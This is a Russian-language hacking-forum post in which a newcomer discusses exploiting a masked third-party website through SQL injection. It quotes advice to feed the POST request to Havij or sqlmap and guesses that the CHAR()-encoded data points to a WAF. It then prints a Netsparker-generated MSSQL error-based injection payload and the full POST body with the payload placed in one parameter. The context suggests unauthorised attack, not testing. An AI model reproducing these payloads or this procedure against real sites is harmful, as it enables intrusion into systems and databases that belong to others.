19.01.2016, 15:46
|
|
Новичок
Регистрация: 17.01.2016
Сообщений: 5
Провел на форуме:
1362
Репутация:
0
|
|
Сообщение от BabaDook
↑
ну ладно , смотри
http://www.------.com/-/Search.htm
из Search.htm видно что пост запрос, для этого тебе надо в хавидж или sqlmap дать сылку УРЛ
http://www.------.com/-/Search.htm
У казать что это пост запрос и указать данные которые отправляются. сканер не акунетикс?
(select+convert(int%2cCHAR(95)%2bCHAR(33)%2bCHAR(6 4)%2bCHAR(50)%2bCHAR(100)%2bCHAR(105)%2bCHAR(108)% 2bCHAR(101)%2bCHAR(109)%2bCHAR(109)%2bCHAR(97))+FR OM+syscolumns)
там скорее всего waf суда по данным которые закодированы чаром
я так и делал, подставлял и полностью и частями, но не получилось. Сканер Netsparker
полный запрос выглядит так:
nameIn=Smith&sizeIn=3&pornstarID=(select+convert(i nt%2cCHAR(95)%2bCHAR(33)%2bCHAR(64)%2bCHAR(50)%2bC HAR(100)%2bCHAR(105)%2bCHAR(108)%2bCHAR(101)%2bCHA R(109)%2bCHAR(109)%2bCHAR(97))+FROM+syscolumns)&pr iceIn=All&companyIn=All&fetishIn=3&searchKW=3&sear chCT=3&SearchString=Fetish+Fantasy&toySort=date
|
|
|